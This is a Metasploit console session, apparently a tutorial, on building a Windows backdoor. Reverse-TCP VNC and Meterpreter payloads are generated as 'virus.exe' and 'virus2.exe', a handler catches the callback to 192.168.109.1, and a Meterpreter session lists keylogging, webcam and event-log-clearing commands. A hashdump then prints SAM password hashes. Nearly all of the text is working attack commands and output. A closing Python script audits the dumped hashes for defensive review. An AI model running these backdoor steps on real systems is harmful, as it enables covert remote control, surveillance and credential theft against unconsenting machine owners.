Creating a backdoor with Metasploit

 =[ metasploit v3.8.0-dev [core:3.8 api:1.0]
+ -- --=[ 688 exploits - 357 auxiliary - 39 post
+ -- --=[ 217 payloads - 27 encoders - 8 nops
 =[ svn r12644 updated today (2011.05.17)

msf > show payloads

Payloads
========

 Name Disclosure Date Rank Description
---- --------------- ---- -----------
 aix/ppc/shell_bind_tcp normal AIX Command Shell, Bind TCP Inline
 aix/ppc/shell_find_port normal AIX Command Shell, Find Port Inline
 aix/ppc/shell_interact normal AIX execve shell for inetd
 aix/ppc/shell_reverse_tcp normal AIX Command Shell, Reverse TCP Inline
 bsd/sparc/shell_bind_tcp normal BSD Command Shell, Bind TCP Inline
 bsd/sparc/shell_reverse_tcp normal BSD Command Shell, Reverse TCP Inline
 bsd/x86/exec normal BSD Execute Command
 bsd/x86/metsvc_bind_tcp normal FreeBSD Meterpreter Service, Bind TCP
 bsd/x86/metsvc_reverse_tcp normal FreeBSD Meterpreter Service, Reverse TCP Inline
 bsd/x86/shell/bind_tcp normal BSD Command Shell, Bind TCP Stager
 bsd/x86/shell/find_tag normal BSD Command Shell, Find Tag Stager
 bsd/x86/shell/reverse_tcp normal BSD Command Shell, Reverse TCP Stager
 bsd/x86/shell_bind_tcp normal BSD Command Shell, Bind TCP Inline
 bsd/x86/shell_find_port normal BSD Command Shell, Find Port Inline
 bsd/x86/shell_find_tag normal BSD Command Shell, Find Tag Inline
 bsd/x86/shell_reverse_tcp normal BSD Command Shell, Reverse TCP Inline
 bsdi/x86/shell/bind_tcp normal BSDi Command Shell, Bind TCP Stager
 bsdi/x86/shell/reverse_tcp normal BSDi Command Shell, Reverse TCP Stager
 bsdi/x86/shell_bind_tcp normal BSDi Command Shell, Bind TCP Inline
 bsdi/x86/shell_find_port normal BSDi Command Shell, Find Port Inline
 bsdi/x86/shell_reverse_tcp normal BSDi Command Shell, Reverse TCP Inline
 cmd/unix/bind_inetd normal Unix Command Shell, Bind TCP (inetd)
 cmd/unix/bind_netcat normal Unix Command Shell, Bind TCP (via netcat -e)
 cmd/unix/bind_perl normal Unix Command Shell, Bind TCP (via perl)
 cmd/unix/bind_ruby normal Unix Command Shell, Bind TCP (via Ruby)
 cmd/unix/generic normal Unix Command, Generic command execution
 cmd/unix/interact normal Unix Command, Interact with established connection
 cmd/unix/reverse normal Unix Command Shell, Double reverse TCP (telnet)
 cmd/unix/reverse_bash normal Unix Command Shell, Reverse TCP (/dev/tcp)
 cmd/unix/reverse_netcat normal Unix Command Shell, Reverse TCP (via netcat -e)
 cmd/unix/reverse_perl normal Unix Command Shell, Reverse TCP (via perl)
 cmd/unix/reverse_ruby normal Unix Command Shell, Reverse TCP (via Ruby)
 cmd/windows/adduser normal Windows Execute net user /ADD CMD
 cmd/windows/bind_perl normal Windows Command Shell, Bind TCP (via perl)
 cmd/windows/bind_ruby normal Windows Command Shell, Bind TCP (via Ruby)
 cmd/windows/download_exec_vbs normal Windows Executable Download and Execute (via .vbs)
 cmd/windows/reverse_perl normal Windows Command, Double reverse TCP connection (via perl)
 cmd/windows/reverse_ruby normal Windows Command Shell, Reverse TCP (via Ruby)
 generic/debug_trap normal Generic x86 Debug Trap
 generic/shell_bind_tcp normal Generic Command Shell, Bind TCP Inline
 generic/shell_reverse_tcp normal Generic Command Shell, Reverse TCP Inline
 generic/tight_loop normal Generic x86 Tight Loop
 java/jsp_shell_bind_tcp normal Java JSP Command Shell, Bind TCP Inline
 java/jsp_shell_reverse_tcp normal Java JSP Command Shell, Reverse TCP Inline
 java/meterpreter/bind_tcp normal Java Meterpreter, Java Bind TCP stager
 java/meterpreter/reverse_tcp normal Java Meterpreter, Java Reverse TCP stager
 java/shell/bind_tcp normal Command Shell, Java Bind TCP stager
 java/shell/reverse_tcp normal Command Shell, Java Reverse TCP stager
 linux/armle/adduser normal Linux Add User
 linux/armle/exec normal Linux Execute Command
 linux/armle/shell_reverse_tcp normal Linux Command Shell, Reverse TCP Inline
 linux/mipsbe/shell_reverse_tcp normal Linux Command Shell, Reverse TCP Inline
 linux/mipsle/shell_reverse_tcp normal Linux Command Shell, Reverse TCP Inline
 linux/ppc/shell_bind_tcp normal Linux Command Shell, Bind TCP Inline
 linux/ppc/shell_find_port normal Linux Command Shell, Find Port Inline
 linux/ppc/shell_reverse_tcp normal Linux Command Shell, Reverse TCP Inline
 linux/ppc64/shell_bind_tcp normal Linux Command Shell, Bind TCP Inline
 linux/ppc64/shell_find_port normal Linux Command Shell, Find Port Inline
 linux/ppc64/shell_reverse_tcp normal Linux Command Shell, Reverse TCP Inline
 linux/x86/adduser normal Linux Add User
 linux/x86/chmod normal Linux Chmod
 linux/x86/exec normal Linux Execute Command
 linux/x86/meterpreter/bind_ipv6_tcp normal Linux Meterpreter, Bind TCP Stager (IPv6)
 linux/x86/meterpreter/bind_tcp normal Linux Meterpreter, Bind TCP Stager
 linux/x86/meterpreter/find_tag normal Linux Meterpreter, Find Tag Stager
 linux/x86/meterpreter/reverse_ipv6_tcp normal Linux Meterpreter, Reverse TCP Stager (IPv6)
 linux/x86/meterpreter/reverse_tcp normal Linux Meterpreter, Reverse TCP Stager
 linux/x86/metsvc_bind_tcp normal Linux Meterpreter Service, Bind TCP
 linux/x86/metsvc_reverse_tcp normal Linux Meterpreter Service, Reverse TCP Inline
 linux/x86/shell/bind_ipv6_tcp normal Linux Command Shell, Bind TCP Stager (IPv6)
 linux/x86/shell/bind_tcp normal Linux Command Shell, Bind TCP Stager
 linux/x86/shell/find_tag normal Linux Command Shell, Find Tag Stager
 linux/x86/shell/reverse_ipv6_tcp normal Linux Command Shell, Reverse TCP Stager (IPv6)
 linux/x86/shell/reverse_tcp normal Linux Command Shell, Reverse TCP Stager
 linux/x86/shell_bind_ipv6_tcp normal Linux Command Shell, Bind TCP Inline (IPv6)
 linux/x86/shell_bind_tcp normal Linux Command Shell, Bind TCP Inline
 linux/x86/shell_find_port normal Linux Command Shell, Find Port Inline
 linux/x86/shell_find_tag normal Linux Command Shell, Find Tag Inline
 linux/x86/shell_reverse_tcp normal Linux Command Shell, Reverse TCP Inline
 linux/x86/shell_reverse_tcp2 normal Linux Command Shell, Reverse TCP Inline - Metasm demo
 netware/shell/reverse_tcp normal NetWare Command Shell, Reverse TCP Stager
 osx/armle/execute/bind_tcp normal OSX Write and Execute Binary, Bind TCP Stager
 osx/armle/execute/reverse_tcp normal OSX Write and Execute Binary, Reverse TCP Stager
 osx/armle/shell/bind_tcp normal OSX Command Shell, Bind TCP Stager
 osx/armle/shell/reverse_tcp normal OSX Command Shell, Reverse TCP Stager
 osx/armle/shell_bind_tcp normal OSX Command Shell, Bind TCP Inline
 osx/armle/shell_reverse_tcp normal OSX Command Shell, Reverse TCP Inline
 osx/armle/vibrate normal OSX iPhone Vibrate
 osx/ppc/shell/bind_tcp normal OSX Command Shell, Bind TCP Stager
 osx/ppc/shell/find_tag normal OSX Command Shell, Find Tag Stager
 osx/ppc/shell/reverse_tcp normal OSX Command Shell, Reverse TCP Stager
 osx/ppc/shell_bind_tcp normal OSX Command Shell, Bind TCP Inline
 osx/ppc/shell_reverse_tcp normal OSX Command Shell, Reverse TCP Inline
 osx/x86/bundleinject/bind_tcp normal Mac OS X Inject Mach-O Bundle, Bind TCP Stager
 osx/x86/bundleinject/reverse_tcp normal Mac OS X Inject Mach-O Bundle, Reverse TCP Stager
 osx/x86/exec normal OSX Execute Command
 osx/x86/isight/bind_tcp normal Mac OS X x86 iSight photo capture, Bind TCP Stager
 osx/x86/isight/reverse_tcp normal Mac OS X x86 iSight photo capture, Reverse TCP Stager
 osx/x86/shell_bind_tcp normal OSX Command Shell, Bind TCP Inline
 osx/x86/shell_find_port normal OSX Command Shell, Find Port Inline
 osx/x86/shell_reverse_tcp normal OSX Command Shell, Reverse TCP Inline
 osx/x86/vforkshell/bind_tcp normal OSX (vfork) Command Shell, Bind TCP Stager
 osx/x86/vforkshell/reverse_tcp normal OSX (vfork) Command Shell, Reverse TCP Stager
 osx/x86/vforkshell_bind_tcp normal OSX (vfork) Command Shell, Bind TCP Inline
 osx/x86/vforkshell_reverse_tcp normal OSX (vfork) Command Shell, Reverse TCP Inline
 php/bind_perl normal PHP Command Shell, Bind TCP (via perl)
 php/bind_php normal PHP Command Shell, Bind TCP (via php)
 php/download_exec normal PHP Executable Download and Execute
 php/exec normal PHP Execute Command
 php/meterpreter/bind_tcp normal PHP Meterpreter, Bind TCP Stager
 php/meterpreter/reverse_tcp normal PHP Meterpreter, PHP Reverse TCP stager
 php/meterpreter_reverse_tcp normal PHP Meterpreter, Reverse TCP Inline
 php/reverse_perl normal PHP Command, Double reverse TCP connection (via perl)
 php/reverse_php normal PHP Command Shell, Reverse TCP (via php)
 php/shell_findsock normal PHP Command Shell, Find Sock
 solaris/sparc/shell_bind_tcp normal Solaris Command Shell, Bind TCP Inline
 solaris/sparc/shell_find_port normal Solaris Command Shell, Find Port Inline
 solaris/sparc/shell_reverse_tcp normal Solaris Command Shell, Reverse TCP Inline
 solaris/x86/shell_bind_tcp normal Solaris Command Shell, Bind TCP Inline
 solaris/x86/shell_find_port normal Solaris Command Shell, Find Port Inline
 solaris/x86/shell_reverse_tcp normal Solaris Command Shell, Reverse TCP Inline
 tty/unix/interact normal Unix TTY, Interact with established connection
 windows/adduser normal Windows Execute net user /ADD
 windows/dllinject/bind_ipv6_tcp normal Reflective Dll Injection, Bind TCP Stager (IPv6)
 windows/dllinject/bind_nonx_tcp normal Reflective Dll Injection, Bind TCP Stager (No NX or Win7)
 windows/dllinject/bind_tcp normal Reflective Dll Injection, Bind TCP Stager
 windows/dllinject/find_tag normal Reflective Dll Injection, Find Tag Ordinal Stager
 windows/dllinject/reverse_http normal Reflective Dll Injection, PassiveX Reverse HTTP Tunneling Stager
 windows/dllinject/reverse_ipv6_tcp normal Reflective Dll Injection, Reverse TCP Stager (IPv6)
 windows/dllinject/reverse_nonx_tcp normal Reflective Dll Injection, Reverse TCP Stager (No NX or Win7)
 windows/dllinject/reverse_ord_tcp normal Reflective Dll Injection, Reverse Ordinal TCP Stager (No NX or Win7)
 windows/dllinject/reverse_tcp normal Reflective Dll Injection, Reverse TCP Stager
 windows/dllinject/reverse_tcp_allports normal Reflective Dll Injection, Reverse All-Port TCP Stager
 windows/dllinject/reverse_tcp_dns normal Reflective Dll Injection, Reverse TCP Stager (DNS)
 windows/download_exec normal Windows Executable Download and Execute
 windows/exec normal Windows Execute Command
 windows/messagebox normal Windows MessageBox
 windows/meterpreter/bind_ipv6_tcp normal Windows Meterpreter (Reflective Injection), Bind TCP Stager (IPv6)
 windows/meterpreter/bind_nonx_tcp normal Windows Meterpreter (Reflective Injection), Bind TCP Stager (No NX or Win7)
 windows/meterpreter/bind_tcp normal Windows Meterpreter (Reflective Injection), Bind TCP Stager
 windows/meterpreter/find_tag normal Windows Meterpreter (Reflective Injection), Find Tag Ordinal Stager
 windows/meterpreter/reverse_http normal Windows Meterpreter (Reflective Injection), PassiveX Reverse HTTP Tunneling Stager
 windows/meterpreter/reverse_https normal Windows Meterpreter (Reflective Injection), Reverse HTTPS Stager
 windows/meterpreter/reverse_ipv6_tcp normal Windows Meterpreter (Reflective Injection), Reverse TCP Stager (IPv6)
 windows/meterpreter/reverse_nonx_tcp normal Windows Meterpreter (Reflective Injection), Reverse TCP Stager (No NX or Win7)
 windows/meterpreter/reverse_ord_tcp normal Windows Meterpreter (Reflective Injection), Reverse Ordinal TCP Stager (No NX or Win7)
 windows/meterpreter/reverse_tcp normal Windows Meterpreter (Reflective Injection), Reverse TCP Stager
 windows/meterpreter/reverse_tcp_allports normal Windows Meterpreter (Reflective Injection), Reverse All-Port TCP Stager
 windows/meterpreter/reverse_tcp_dns normal Windows Meterpreter (Reflective Injection), Reverse TCP Stager (DNS)
 windows/metsvc_bind_tcp normal Windows Meterpreter Service, Bind TCP
 windows/metsvc_reverse_tcp normal Windows Meterpreter Service, Reverse TCP Inline
 windows/patchupdllinject/bind_ipv6_tcp normal Windows Inject DLL, Bind TCP Stager (IPv6)
 windows/patchupdllinject/bind_nonx_tcp normal Windows Inject DLL, Bind TCP Stager (No NX or Win7)
 windows/patchupdllinject/bind_tcp normal Windows Inject DLL, Bind TCP Stager
 windows/patchupdllinject/find_tag normal Windows Inject DLL, Find Tag Ordinal Stager
 windows/patchupdllinject/reverse_ipv6_tcp normal Windows Inject DLL, Reverse TCP Stager (IPv6)
 windows/patchupdllinject/reverse_nonx_tcp normal Windows Inject DLL, Reverse TCP Stager (No NX or Win7)
 windows/patchupdllinject/reverse_ord_tcp normal Windows Inject DLL, Reverse Ordinal TCP Stager (No NX or Win7)
 windows/patchupdllinject/reverse_tcp normal Windows Inject DLL, Reverse TCP Stager
 windows/patchupdllinject/reverse_tcp_allports normal Windows Inject DLL, Reverse All-Port TCP Stager
 windows/patchupdllinject/reverse_tcp_dns normal Windows Inject DLL, Reverse TCP Stager (DNS)
 windows/patchupmeterpreter/bind_ipv6_tcp normal Windows Meterpreter (skape/jt injection), Bind TCP Stager (IPv6)
 windows/patchupmeterpreter/bind_nonx_tcp normal Windows Meterpreter (skape/jt injection), Bind TCP Stager (No NX or Win7)
 windows/patchupmeterpreter/bind_tcp normal Windows Meterpreter (skape/jt injection), Bind TCP Stager
 windows/patchupmeterpreter/find_tag normal Windows Meterpreter (skape/jt injection), Find Tag Ordinal Stager
 windows/patchupmeterpreter/reverse_ipv6_tcp normal Windows Meterpreter (skape/jt injection), Reverse TCP Stager (IPv6)
 windows/patchupmeterpreter/reverse_nonx_tcp normal Windows Meterpreter (skape/jt injection), Reverse TCP Stager (No NX or Win7)
 windows/patchupmeterpreter/reverse_ord_tcp normal Windows Meterpreter (skape/jt injection), Reverse Ordinal TCP Stager (No NX or Win7)
 windows/patchupmeterpreter/reverse_tcp normal Windows Meterpreter (skape/jt injection), Reverse TCP Stager
 windows/patchupmeterpreter/reverse_tcp_allports normal Windows Meterpreter (skape/jt injection), Reverse All-Port TCP Stager
 windows/patchupmeterpreter/reverse_tcp_dns normal Windows Meterpreter (skape/jt injection), Reverse TCP Stager (DNS)
 windows/shell/bind_ipv6_tcp normal Windows Command Shell, Bind TCP Stager (IPv6)
 windows/shell/bind_nonx_tcp normal Windows Command Shell, Bind TCP Stager (No NX or Win7)
 windows/shell/bind_tcp normal Windows Command Shell, Bind TCP Stager
 windows/shell/find_tag normal Windows Command Shell, Find Tag Ordinal Stager
 windows/shell/reverse_http normal Windows Command Shell, PassiveX Reverse HTTP Tunneling Stager
 windows/shell/reverse_ipv6_tcp normal Windows Command Shell, Reverse TCP Stager (IPv6)
 windows/shell/reverse_nonx_tcp normal Windows Command Shell, Reverse TCP Stager (No NX or Win7)
 windows/shell/reverse_ord_tcp normal Windows Command Shell, Reverse Ordinal TCP Stager (No NX or Win7)
 windows/shell/reverse_tcp normal Windows Command Shell, Reverse TCP Stager
 windows/shell/reverse_tcp_allports normal Windows Command Shell, Reverse All-Port TCP Stager
 windows/shell/reverse_tcp_dns normal Windows Command Shell, Reverse TCP Stager (DNS)
 windows/shell_bind_tcp normal Windows Command Shell, Bind TCP Inline
 windows/shell_bind_tcp_xpfw normal Windows Disable Windows ICF, Command Shell, Bind TCP Inline
 windows/shell_reverse_tcp normal Windows Command Shell, Reverse TCP Inline
 windows/speak_pwned normal Windows Speech API - Say You Got Pwned!
 windows/upexec/bind_ipv6_tcp normal Windows Upload/Execute, Bind TCP Stager (IPv6)
 windows/upexec/bind_nonx_tcp normal Windows Upload/Execute, Bind TCP Stager (No NX or Win7)
 windows/upexec/bind_tcp normal Windows Upload/Execute, Bind TCP Stager
 windows/upexec/find_tag normal Windows Upload/Execute, Find Tag Ordinal Stager
 windows/upexec/reverse_http normal Windows Upload/Execute, PassiveX Reverse HTTP Tunneling Stager
 windows/upexec/reverse_ipv6_tcp normal Windows Upload/Execute, Reverse TCP Stager (IPv6)
 windows/upexec/reverse_nonx_tcp normal Windows Upload/Execute, Reverse TCP Stager (No NX or Win7)
 windows/upexec/reverse_ord_tcp normal Windows Upload/Execute, Reverse Ordinal TCP Stager (No NX or Win7)
 windows/upexec/reverse_tcp normal Windows Upload/Execute, Reverse TCP Stager
 windows/upexec/reverse_tcp_allports normal Windows Upload/Execute, Reverse All-Port TCP Stager
 windows/upexec/reverse_tcp_dns normal Windows Upload/Execute, Reverse TCP Stager (DNS)
 windows/vncinject/bind_ipv6_tcp normal VNC Server (Reflective Injection), Bind TCP Stager (IPv6)
 windows/vncinject/bind_nonx_tcp normal VNC Server (Reflective Injection), Bind TCP Stager (No NX or Win7)
 windows/vncinject/bind_tcp normal VNC Server (Reflective Injection), Bind TCP Stager
 windows/vncinject/find_tag normal VNC Server (Reflective Injection), Find Tag Ordinal Stager
 windows/vncinject/reverse_http normal VNC Server (Reflective Injection), PassiveX Reverse HTTP Tunneling Stager
 windows/vncinject/reverse_ipv6_tcp normal VNC Server (Reflective Injection), Reverse TCP Stager (IPv6)
 windows/vncinject/reverse_nonx_tcp normal VNC Server (Reflective Injection), Reverse TCP Stager (No NX or Win7)
 windows/vncinject/reverse_ord_tcp normal VNC Server (Reflective Injection), Reverse Ordinal TCP Stager (No NX or Win7)
 windows/vncinject/reverse_tcp normal VNC Server (Reflective Injection), Reverse TCP Stager
 windows/vncinject/reverse_tcp_allports normal VNC Server (Reflective Injection), Reverse All-Port TCP Stager
 windows/vncinject/reverse_tcp_dns normal VNC Server (Reflective Injection), Reverse TCP Stager (DNS)
 windows/x64/exec normal Windows x64 Execute Command
 windows/x64/meterpreter/bind_tcp normal Windows x64 Meterpreter, Windows x64 Bind TCP Stager
 windows/x64/meterpreter/reverse_tcp normal Windows x64 Meterpreter, Windows x64 Reverse TCP Stager
 windows/x64/shell/bind_tcp normal Windows x64 Command Shell, Windows x64 Bind TCP Stager
 windows/x64/shell/reverse_tcp normal Windows x64 Command Shell, Windows x64 Reverse TCP Stager
 windows/x64/shell_bind_tcp normal Windows x64 Command Shell, Bind TCP Inline
 windows/x64/shell_reverse_tcp normal Windows x64 Command Shell, Reverse TCP Inline
 windows/x64/vncinject/bind_tcp normal Windows x64 VNC Server (Reflective Injection), Windows x64 Bind TCP Stager
 windows/x64/vncinject/reverse_tcp normal Windows x64 VNC Server (Reflective Injection), Windows x64 Reverse TCP Stager

msf > use windows/vncinject/reverse_tcp
msf payload(reverse_tcp) > show options

Module options (payload/windows/vncinject/reverse_tcp):

 Name Current Setting Required Description
---- --------------- -------- -----------
 AUTOVNC true yes Automatically launch VNC viewer if present
 EXITFUNC process yes Exit technique: seh, thread, process, none
 LHOST yes The listen address
 LPORT 4444 yes The listen port
 VNCHOST 127.0.0.1 yes The local host to use for the VNC proxy
 VNCPORT 5900 yes The local port to use for the VNC proxy

msf payload(reverse_tcp) > set LHOST 192.168.109.1
LHOST => 192.168.109.1
msf payload(reverse_tcp) > generate -h
Usage: generate [options]

Generates a payload.

OPTIONS:

 -E Force encoding.
 -b <opt> The list of characters to avoid: '\x00\xff'
 -e <opt> The name of the encoder module to use.
 -f <opt> The output file name (otherwise stdout)
 -h Help banner.
 -i <opt> the number of encoding iterations.
 -k Keep the template executable functional
 -o <opt> A comma separated list of options in VAR=VAL format.
 -p <opt> The Platform for output.
 -s <opt> NOP sled length.
 -t <opt> The output format: raw,ruby,rb,perl,pl,c,js_be,js_le,java,dll,exe,exe-small,elf,macho,vba,vbs,loop-vbs,asp,war
 -x <opt> The executable template to use

msf payload(reverse_tcp) > generate -f virus.exe -t exe
[*] Writing 73802 bytes to virus.exe...
msf payload(reverse_tcp) > ls -al virus.exe
[*] exec: ls -al virus.exe

-rwx------+ 1 ByJJoon None 73802 May 18 06:38 virus.exe
msf payload(reverse_tcp) > file virus.exe
[*] exec: file virus.exe

virus.exe: PE32 executable (GUI) Intel 80386, for MS Windows
msf payload(reverse_tcp) > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD windows/vncinject/reverse_tcp
PAYLOAD => windows/vncinject/reverse_tcp
msf exploit(handler) > show options

Module options (exploit/multi/handler):

 Name Current Setting Required Description
---- --------------- -------- -----------

Payload options (windows/vncinject/reverse_tcp):

 Name Current Setting Required Description
---- --------------- -------- -----------
 AUTOVNC true yes Automatically launch VNC viewer if present
 EXITFUNC process yes Exit technique: seh, thread, process, none
 LHOST yes The listen address
 LPORT 4444 yes The listen port
 VNCHOST 127.0.0.1 yes The local host to use for the VNC proxy
 VNCPORT 5900 yes The local port to use for the VNC proxy

Exploit target:

 Id Name
-- ----
 0 Wildcard Target

msf exploit(handler) > set LHOST 192.168.109.1
LHOST => 192.168.109.1
msf exploit(handler) > exploit

[*] Started reverse handler on 192.168.109.1:4444
[*] Starting the payload handler...
[*] Sending stage (445440 bytes) to 192.168.109.128
[*] Starting local TCP relay on 127.0.0.1:5900...
[*] Local TCP relay started.
[*] Launched vncviewer.
[*] Session 1 created in the background.
msf exploit(handler) >

msf exploit(handler) > use windows/meterpreter/reverse_tcp
msf payload(reverse_tcp) > show options

Module options (payload/windows/meterpreter/reverse_tcp):

 Name Current Setting Required Description
---- --------------- -------- -----------
 EXITFUNC process yes Exit technique: seh, thread, process, none
 LHOST yes The listen address
 LPORT 4444 yes The listen port

msf payload(reverse_tcp) > set LHOST 192.168.109.1
LHOST => 192.168.109.1
msf payload(reverse_tcp) > generate -f virus2.exe -t exe
[*] Writing 73802 bytes to virus2.exe...
msf payload(reverse_tcp) > ls -al virus2.exe
[*] exec: ls -al virus2.exe

-rwx------+ 1 ByJJoon None 73802 May 18 06:50 virus2.exe
msf payload(reverse_tcp) > file virus2.exe
[*] exec: file virus2.exe

virus2.exe: PE32 executable (GUI) Intel 80386, for MS Windows
msf payload(reverse_tcp) > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(handler) > show options

Module options (exploit/multi/handler):

 Name Current Setting Required Description
---- --------------- -------- -----------

Payload options (windows/meterpreter/reverse_tcp):

 Name Current Setting Required Description
---- --------------- -------- -----------
 EXITFUNC process yes Exit technique: seh, thread, process, none
 LHOST 192.168.109.1 yes The listen address
 LPORT 4444 yes The listen port

Exploit target:

 Id Name
-- ----
 0 Wildcard Target

msf exploit(handler) > exploit

[*] Started reverse handler on 192.168.109.1:4444
[*] Starting the payload handler...
[*] Sending stage (749056 bytes) to 192.168.109.128
[*] Meterpreter session 2 opened (192.168.109.1:4444 -> 192.168.109.128:1074) at 2011-05-18 06:51:23 +0900

meterpreter > help

Core Commands
=============

 Command Description
------- -----------
 ? Help menu
 background Backgrounds the current session
 bgkill Kills a background meterpreter script
 bglist Lists running background scripts
 bgrun Executes a meterpreter script as a background thread
 channel Displays information about active channels
 close Closes a channel
 exit Terminate the meterpreter session
 help Help menu
 info Displays information about a Post module
 interact Interacts with a channel
 irb Drop into irb scripting mode
 load Load one or more meterpreter extensions
 migrate Migrate the server to another process
 quit Terminate the meterpreter session
 read Reads data from a channel
 resource Run the commands stored in a file
 run Executes a meterpreter script or Post module
 use Deprecated alias for 'load'
 write Writes data to a channel

Stdapi: File system Commands
============================

 Command Description
------- -----------
 cat Read the contents of a file to the screen
 cd Change directory
 del Delete the specified file
 download Download a file or directory
 edit Edit a file
 getlwd Print local working directory
 getwd Print working directory
 lcd Change local working directory
 lpwd Print local working directory
 ls List files
 mkdir Make directory
 pwd Print working directory
 rm Delete the specified file
 rmdir Remove directory
 search Search for files
 upload Upload a file or directory

Stdapi: Networking Commands
===========================

 Command Description
------- -----------
 ipconfig Display interfaces
 portfwd Forward a local port to a remote service
 route View and modify the routing table

Stdapi: System Commands
=======================

 Command Description
------- -----------
 clearev Clear the event log
 drop_token Relinquishes any active impersonation token.
 execute Execute a command
 getpid Get the current process identifier
 getprivs Attempt to enable all privileges available to the current process
 getuid Get the user that the server is running as
 kill Terminate a process
 ps List running processes
 reboot Reboots the remote computer
 reg Modify and interact with the remote registry
 rev2self Calls RevertToSelf() on the remote machine
 shell Drop into a system command shell
 shutdown Shuts down the remote computer
 steal_token Attempts to steal an impersonation token from the target process
 sysinfo Gets information about the remote system, such as OS

Stdapi: User interface Commands
===============================

 Command Description
------- -----------
 enumdesktops List all accessible desktops and window stations
 getdesktop Get the current meterpreter desktop
 idletime Returns the number of seconds the remote user has been idle
 keyscan_dump Dump the keystroke buffer
 keyscan_start Start capturing keystrokes
 keyscan_stop Stop capturing keystrokes
 screenshot Grab a screenshot of the interactive desktop
 setdesktop Change the meterpreters current desktop
 uictl Control some of the user interface components

Stdapi: Webcam Commands
=======================

 Command Description
------- -----------
 record_mic Record audio from the default microphone for X seconds
 webcam_list List webcams
 webcam_snap Take a snapshot from the specified webcam

Priv: Elevate Commands
======================

 Command Description
------- -----------
 getsystem Attempt to elevate your privilege to that of local system.

Priv: Password database Commands
================================

 Command Description
------- -----------
 hashdump Dumps the contents of the SAM database

Priv: Timestomp Commands
========================

 Command Description
------- -----------
 timestomp Manipulate file MACE attributes

meterpreter > hashdump
Administrator:500:6c36913468365950aad3b435b51404ee:711161255cd9560e884378d0e28a5027:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
HelpAssistant:1000:a51f93e4803b68166e1cee91c7744d1f:7d28b6b112e8f84513b8d1e3aa40d1a7:::
SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:35db8a26c8621e45b0ef24a043665a23:::
Test:1003:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
meterpreter >
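The hashdump output above is in pwdump format (user:RID:LM hash:NT hash:::). From a defender's side, the same lines are what a SAM audit looks at: an NT hash equal to the hash of the empty string means a blank password, and an LM field other than the empty-string LM value means the legacy LM hash is still being stored (the NoLMHash policy is not enforced), with the second half of the LM hash equal to the empty half when the password is 7 characters or fewer. The following parser and audit is an added example, not code from the original post or from Metasploit; the sample input is the five hashdump lines shown above, and the three hash constants are the well-known LM/NT values for an empty password.

```python
import re
from dataclasses import dataclass

# Well-known constants for the empty password under each hashing scheme.
# LM hash of an empty password; Windows also stores this value when LM hashing is disabled.
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"
# NT hash (MD4 over UTF-16LE "") of an empty password.
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"
# Second half of an LM hash when the password is 7 characters or fewer.
EMPTY_LM_HALF = "aad3b435b51404ee"

# One pwdump-format line: user:rid:lm:nt:::
LINE_RE = re.compile(r"^([^:]+):(\d+):([0-9a-fA-F]{32}):([0-9a-fA-F]{32}):::$")

# Sample input: the hashdump lines from the session above.
SAMPLE = """
Administrator:500:6c36913468365950aad3b435b51404ee:711161255cd9560e884378d0e28a5027:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
HelpAssistant:1000:a51f93e4803b68166e1cee91c7744d1f:7d28b6b112e8f84513b8d1e3aa40d1a7:::
SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:35db8a26c8621e45b0ef24a043665a23:::
Test:1003:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
"""


@dataclass
class Account:
    user: str
    rid: int
    lm: str
    nt: str


def parse_hashdump(text):
    """Parse pwdump-format lines into Account records; reject anything malformed."""
    accounts = []
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        m = LINE_RE.match(line)
        if not m:
            raise ValueError(f"unrecognised hashdump line: {line!r}")
        accounts.append(Account(m.group(1), int(m.group(2)),
                                m.group(3).lower(), m.group(4).lower()))
    return accounts


def audit(accounts):
    """Return {user: [findings]} for accounts a SAM hardening review would flag."""
    findings = {}
    for a in accounts:
        issues = []
        if a.nt == EMPTY_NT:
            issues.append("blank password")
        if a.lm != EMPTY_LM:
            issues.append("LM hash stored (NoLMHash not enforced)")
            if a.lm[16:] == EMPTY_LM_HALF:
                issues.append("password is 7 characters or fewer")
        if a.rid == 500:
            issues.append("built-in Administrator (RID 500)")
        if issues:
            findings[a.user] = issues
    return findings


if __name__ == "__main__":
    for user, issues in audit(parse_hashdump(SAMPLE)).items():
        print(f"{user}: {', '.join(issues)}")
```

Run against the sample, the audit flags Guest and Test as blank-password accounts, Administrator and HelpAssistant as still carrying LM hashes (Administrator's short second half additionally reveals a password of at most 7 characters), and leaves SUPPORT_388945a0 unflagged.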
